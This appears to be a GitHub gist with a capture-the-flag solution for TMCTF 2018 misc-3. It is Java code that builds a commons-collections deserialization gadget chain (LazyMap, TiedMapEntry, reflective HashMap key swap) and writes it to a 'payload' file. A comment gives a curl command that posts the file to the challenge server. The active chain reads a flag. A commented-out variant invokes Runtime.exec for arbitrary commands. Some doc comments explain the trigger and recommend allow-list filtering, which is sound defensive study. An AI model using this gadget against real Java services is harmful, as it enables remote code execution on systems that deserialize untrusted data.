@shinh
Created September 15, 2018 08:06
TMCTF 2018 misc-3
import java.io.*;
import java.util.*;
import javax.servlet.ServletInputStream;
import com.trendmicro.CustomOIS;
import com.trendmicro.Person;
import com.trendmicro.jail.Flag;
import org.apache.commons.collections.Factory;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import java.lang.reflect.Field;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import javax.management.BadAttributeValueExpException;
import sun.reflect.ReflectionFactory;
public class test {
/**
 * Exposes the bytes accumulated in {@code baos} as a {@link ServletInputStream}, so the
 * locally built stream can be handed to code that expects a servlet request body.
 *
 * <p>The bytes are copied once, when this method is called; later writes to {@code baos}
 * are not visible through the returned stream.
 *
 * @param baos buffer holding the serialized bytes to replay
 * @return a stream whose {@code read()} delegates to an in-memory copy of those bytes
 */
public static ServletInputStream createServletInputStream2(ByteArrayOutputStream baos) {
    final byte[] snapshot = baos.toByteArray();
    final InputStream source = new ByteArrayInputStream(snapshot);

    // Only the single-byte read() is overridden; everything else is inherited.
    return new ServletInputStream() {
        @Override
        public int read() throws IOException {
            return source.read();
        }
    };
}
/**
 * Builds the object graph that is serialized for the TMCTF 2018 misc-3 challenge: a
 * {@link HashMap} whose single key is replaced, by reflection, with a commons-collections
 * {@code TiedMapEntry} backed by a {@code LazyMap} and a {@code ChainedTransformer}.
 *
 * <p>Nothing in this method hashes or looks up the swapped key, so the transformer chain is
 * only assembled here, not run. Expected trigger (standard JDK / commons-collections 3.x
 * behaviour, not visible in this file): when the bytes are deserialized, {@code HashMap}
 * re-hashes its keys, {@code TiedMapEntry.hashCode()} looks its key up in the
 * {@code LazyMap}, and the lookup of a missing key runs the chain. The method call in the
 * chain therefore executes inside the reader's {@code readObject()}.
 *
 * <p>Defensive reading: the chain needs no {@code Runtime.exec}; it calls a method on an
 * application class. A reader that accepts native Java serialization from untrusted input
 * should admit only the classes it expects (an allow-list, e.g. {@code ObjectInputFilter}),
 * which would reject {@code LazyMap}, {@code TiedMapEntry} and the functor classes outright.
 *
 * @param command copied into {@code execArgs} only; the active chain never uses it
 * @return the tampered {@code HashMap}
 * @throws Exception if any reflective lookup or field write fails
 */
public static Serializable getObject(final String command) throws Exception {
// Referenced only by the commented-out chain below, so effectively unused.
final String[] execArgs = new String[] { command };
// Disabled variant kept by the author: a chain that reaches Runtime.exec(command)
// through InvokerTransformer.
/*
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
*/
// Active chain: start from a Flag instance, invoke its no-argument getFlag(), then
// replace whatever that returned with the constant "zzz".
// NOTE(review): the Flag instance is embedded in the serialized graph, so Flag
// presumably has to be Serializable; the class is not shown here, confirm.
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(new Flag()),
new InvokerTransformer(
"getFlag",
new Class[] {},
new Object[] {}),
new ConstantTransformer("zzz")
};
Transformer transformerChain = new ChainedTransformer(transformers);
// innerMap stays empty, so the key "foo" tied to lazyMap below is a missing key.
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
// Disabled variant: the same key swap done through a HashSet's backing map.
/*
HashSet map = new HashSet(1);
map.add("foo");
Field f = null;
try {
f = HashSet.class.getDeclaredField("map");
} catch (NoSuchFieldException e) {
f = HashSet.class.getDeclaredField("backingMap");
}
f.setAccessible(true);
HashMap innimpl = (HashMap) f.get(map);
*/
// The carrier is a plain HashMap populated with an ordinary String key first.
HashMap map = new HashMap();
map.put("foo", "bar");
HashMap innimpl = map;
// Read the map's private bucket array by reflection.
// NOTE(review): the "elementData" fallback is presumably for a class library that names
// the field differently; confirm.
Field f2 = null;
try {
f2 = HashMap.class.getDeclaredField("table");
} catch (NoSuchFieldException e) {
f2 = HashMap.class.getDeclaredField("elementData");
}
f2.setAccessible(true);
Object[] array = (Object[]) f2.get(innimpl);
// First guess at the populated bucket; this value is overwritten by array[7] further down.
Object node = array[0];
if(node == null){
node = array[1];
}
// Debug output. The first line prints the array reference itself under the "node=" label.
System.out.println("node=" + array);
System.out.println("node=" + array.length);
for (int i = 0; i < array.length; i++) {
System.out.println("array " + i + " " + array[i]);
}
System.out.println("node=" + node);
// Hard-coded bucket index. With a default 16-bucket table and OpenJDK 8+ hashing the key
// "foo" lands in bucket 7; for any other layout array[7] is null and the key swap below
// fails.
node = array[7];
// Locate the node's "key" field.
// NOTE(review): the "java.util.MapEntry" fallback presumably targets a different class
// library; confirm.
Field keyField = null;
try{
keyField = node.getClass().getDeclaredField("key");
}catch(Exception e){
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
}
keyField.setAccessible(true);
// Overwrite the key in place. Writing the field directly never calls entry.hashCode().
keyField.set(node, entry);
return map;
}
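/**
 * Serializes the object graph from {@link #getObject(String)}, saves the bytes to a file
 * named {@code payload} in the working directory, and then reads the same bytes back through
 * {@code CustomOIS} as a local rehearsal of the receiving side.
 *
 * <p>NOTE(review): {@code CustomOIS} is not shown in this file; presumably it is the
 * challenge's restricted {@code ObjectInputStream}; confirm. The {@code readObject()} call
 * below is where a reader runs whatever the deserialized graph triggers, which is why native
 * deserialization of untrusted bytes needs a class allow-list on the reading side.
 *
 * <p>Any failure is reported by printing the exception; nothing is rethrown.
 *
 * @param args ignored
 */
public static void main(String[] args) {
    try {
        // Leftover experiment: this chain and map are referenced only by the commented-out
        // lines below. They are kept because the Flag constructor's side effects are unknown.
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(new Flag()),
            new InvokerTransformer(
                "getFlag",
                new Class[] {},
                new Object[] {}),
            new ConstantTransformer("zzz")
        };
        final Transformer transformerChain = new ChainedTransformer(transformers);
        final Map<String, String> map =
            LazyMap.decorate(new HashMap<>(), transformerChain);
        //map.get("xx");
        System.out.println("flag: ");
        //Flag.getFlag();

        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        //oos.writeObject(new Integer(1234));
        //oos.writeObject(new Flag());
        //oos.writeObject(map);
        //oos.writeObject(new Person("foobar"));
        //oos.writeObject(new Mine());
        oos.writeObject(getObject("dummy"));
        // Make sure nothing is left in the stream's internal buffer before copying the bytes.
        oos.flush();

        // try-with-resources closes the file even when write() throws.
        try (FileOutputStream fos = new FileOutputStream("payload")) {
            fos.write(baos.toByteArray());
        }
        System.out.println("go");

        // Replay the bytes locally through the same stream type the receiving side uses.
        //ServletInputStream sis = createServletInputStream("foo", "utf-8");
        ServletInputStream sis = createServletInputStream2(baos);
        CustomOIS cois = new CustomOIS(sis);
        Object o = cois.readObject();
        System.out.println("result: " + o);
    } catch (Exception e) {
        // The original's three catch blocks printed the exception the same way; one
        // boundary catch gives identical output.
        System.out.println("" + e);
    }
}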
}
@shinh

shinh commented Sep 16, 2018

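Run this Java code, which writes the serialized object to a file named `payload`, and then send that file to the challenge endpoint: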

$ curl --data-binary '@payload' http://theflagmarshal.us-east-1.elasticbeanstalk.com/jail | grep TMCTF
